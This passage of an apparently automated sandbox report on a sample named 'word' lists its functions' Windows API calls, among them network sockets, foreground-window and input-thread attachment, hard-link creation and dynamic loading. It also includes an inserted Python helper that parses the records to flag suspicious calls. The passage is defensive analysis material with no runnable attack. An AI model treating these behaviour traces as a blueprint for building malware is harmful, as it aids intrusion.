• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: IsWow64Process$kernel32.dll
• API String ID: 2574300362-3024904723
• Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
• Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
• Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
• Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
APIs
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040EEEB
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EEFD
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
• Opcode ID: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
• Instruction ID: 788ba9bdae5bc0ddad915f4d08bdcf590d5e3b2ea1e3da194f5c7121584c3133
• Opcode Fuzzy Hash: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
• Instruction Fuzzy Hash: ABD0C9B0944703AAC7311F72C91C70A7AE4AB40341F204C3EB996E1691DBBCC0508B2C
APIs
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 05dd77c4c4e1e7f773cce1883d0b5346e5ce6ea378ee5ed9da1d6d56ea86f387
• Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
• Opcode Fuzzy Hash: 05dd77c4c4e1e7f773cce1883d0b5346e5ce6ea378ee5ed9da1d6d56ea86f387
• Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
APIs
• __flush.LIBCMT ref: 00414630
• __fileno.LIBCMT ref: 00414650
• __locking.LIBCMT ref: 00414657
• __flsbuf.LIBCMT ref: 00414682
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
• String ID:
• API String ID: 3240763771-0
• Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
• Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
• Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
• Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
APIs
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
• VariantCopy.OLEAUT32(?,?), ref: 00478259
• VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
• VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: CopyVariant$ErrorLast
• String ID:
• API String ID: 2286883814-0
• Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
• Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
• Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
• Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
• WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
• #21.WSOCK32 (ordinal 21, setsockopt) ref: 004740E0
• WSAGetLastError.WSOCK32(00000000), ref: 004740EB
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
• Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
• Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
• Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
• Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
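The three AddressLibraryLoadProc records above (IcmpCreateFile, IsWow64Process and GetNativeSystemInfo resolved through LoadLibraryA/GetProcAddress) and the socket record just above are the lines an analyst pulls out of a report like this first. The Python helper below is an added example, not part of the Joe Sandbox report or of the sample: it parses the record layout as it appears on this page and flags those two patterns. The layout it assumes (an "APIs" header opens each record, one "• Name.MODULE(args), ref: ADDR" line per call, a "• Opcode ID" line identifies the function) and the Winsock ordinal table are the example's own; the sample input is copied from three of the records above with the indentation dropped.

```python
import re
from dataclasses import dataclass, field

# Added triage helper, not part of the Joe Sandbox report. It parses the
# per-function records on this page and flags LoadLibrary + GetProcAddress
# pairs (the report's "AddressLibraryLoadProc" pattern) with the names they
# resolve, plus socket() calls with their arguments decoded.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
OPCODE_LINE = re.compile(r"^\s*•\s*Opcode ID:\s*(?P<id>[0-9a-f]{64})\s*$")

# Winsock 1.1 export ordinals (wsock32.dll / ws2_32.dll); "#21.WSOCK32" is ordinal 21.
WSOCK_ORDINALS = dict(enumerate((
    "accept bind closesocket connect getpeername getsockname getsockopt htonl "
    "htons ioctlsocket inet_addr inet_ntoa listen ntohl ntohs recv recvfrom "
    "select send sendto setsockopt shutdown socket").split(), start=1))
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {0: "IPPROTO_DEFAULT", 1: "IPPROTO_ICMP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}

@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: str
    subcall: bool     # listed as "Part of subcall function", i.e. made by a callee
    ordinal: int = 0  # set when the report showed the import by ordinal

@dataclass
class Record:
    opcode_id: str = ""
    calls: list = field(default_factory=list)

def parse_records(text):
    """One Record per 'APIs' header; non-API lines inside a record are ignored."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Record()
            records.append(cur)
            continue
        m = OPCODE_LINE.match(line) if cur else None
        if m:
            cur.opcode_id = m.group("id")
            continue
        m = API_LINE.match(line) if cur else None
        if not m:
            continue
        name, module, ordinal = m.group("name"), m.group("module"), 0
        if name.startswith("#") and module.upper() in ("WSOCK32", "WS2_32"):
            ordinal = int(name[1:])
            name = WSOCK_ORDINALS.get(ordinal, name)
        args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        cur.calls.append(Call(name, module, args, m.group("ref"),
                              "Part of subcall" in line, ordinal))
    return records

def _is_hex(s):
    return re.fullmatch(r"-?[0-9A-Fa-f]{8}", s) is not None

def triage(record):
    """Findings for one record; empty list when nothing stands out."""
    findings, own = [], [c for c in record.calls if not c.subcall]
    names = {c.name for c in own}
    if names & LOADERS and "GetProcAddress" in names:
        resolved = [c.args[-1] for c in own if c.name == "GetProcAddress"
                    and c.args and c.args[-1] != "?" and not _is_hex(c.args[-1])]
        findings.append("dynamic resolution of " + ", ".join(resolved))
    for c in own:
        if c.name == "socket" and len(c.args) == 3 and all(map(_is_hex, c.args)):
            af, st, pr = (int(a, 16) for a in c.args)
            findings.append("socket(%s, %s, %s)" % (
                AF.get(af, af), SOCK_TYPE.get(st, st), PROTO.get(pr, pr)))
        elif c.ordinal:
            findings.append("%s (imported by ordinal %d)" % (c.name, c.ordinal))
    return findings

def summarize(text):
    """Opcode ID prefix -> findings, for the records that have any."""
    return {r.opcode_id[:12]: triage(r) for r in parse_records(text) if triage(r)}

# Sample input: lines copied from three of the records above, indentation dropped.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040EE7B
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
• API ID: AddressLibraryLoadProc
• Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
• WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
• #21.WSOCK32 ref: 004740E0
• WSAGetLastError.WSOCK32(00000000), ref: 004740EB
• Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
APIs
• __flush.LIBCMT ref: 00414630
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
• Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
"""

if __name__ == "__main__":
    for prefix, findings in summarize(SAMPLE).items():
        print(prefix, "->", "; ".join(findings))
```

On the socket record the decoder reports socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP), since 2/2/0x11 are the AF_INET, SOCK_DGRAM and IPPROTO_UDP constants, and maps the bare "#21" import to setsockopt, ordinal 21 of wsock32.dll. Calls listed as "Part of subcall function" are kept but excluded from the findings so that a callee's LoadLibrary does not get attributed to every function that reaches it.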
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
• __isleadbyte_l.LIBCMT ref: 004238B2
• MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
• MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
• Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
• Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
• Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
APIs
• CreateHardLinkW.KERNEL32(00000000,?,00000000), ref: 0045D10A
• GetLastError.KERNEL32(?,00000000), ref: 0045D12B
• DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
• CreateHardLinkW.KERNEL32(00000000,?,00000000), ref: 0045D16A
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
• Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
• Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
• Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
APIs
  • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
• SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
• __itow.LIBCMT ref: 00461461
• __itow.LIBCMT ref: 004614AB
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: MessageSend$__itow$_wcslen
• String ID:
• API String ID: 2875217250-0
• Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
• Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
• Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
• Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
APIs
• GetForegroundWindow.USER32 ref: 00472806
  • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
  • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32(00000000), ref: 00443F18
  • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
• GetCaretPos.USER32(?), ref: 0047281A
• ClientToScreen.USER32(00000000,?), ref: 00472856
• GetForegroundWindow.USER32 ref: 0047285C
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
• Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
• Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
• Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                            APIs
                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772A9
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772C0
                                                                            • SetLayeredWindowAttributes.USER32 ref: 004772D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                            • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                            • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                            • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                            APIs
                                                                            • SendMessageW.USER32 ref: 00448CB8
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 312131281-0
                                                                            • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                            • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                            • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                            • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                            APIs
                                                                            • select.WSOCK32 ref: 0045890A
                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                            • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastacceptselect
                                                                            • String ID:
                                                                            • API String ID: 385091864-0
                                                                            • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                            • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                            • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                            • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                            • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                            • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                            • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                            APIs
                                                                            • CreateWindowExW.USER32 ref: 0043367E
                                                                            • GetStockObject.GDI32(00000011), ref: 00433695
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                                            • String ID:
                                                                            • API String ID: 1358664141-0
                                                                            • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                            • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                            • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                            • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                            • MessageBoxW.USER32 ref: 004441F6
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                            • String ID:
                                                                            • API String ID: 2880819207-0
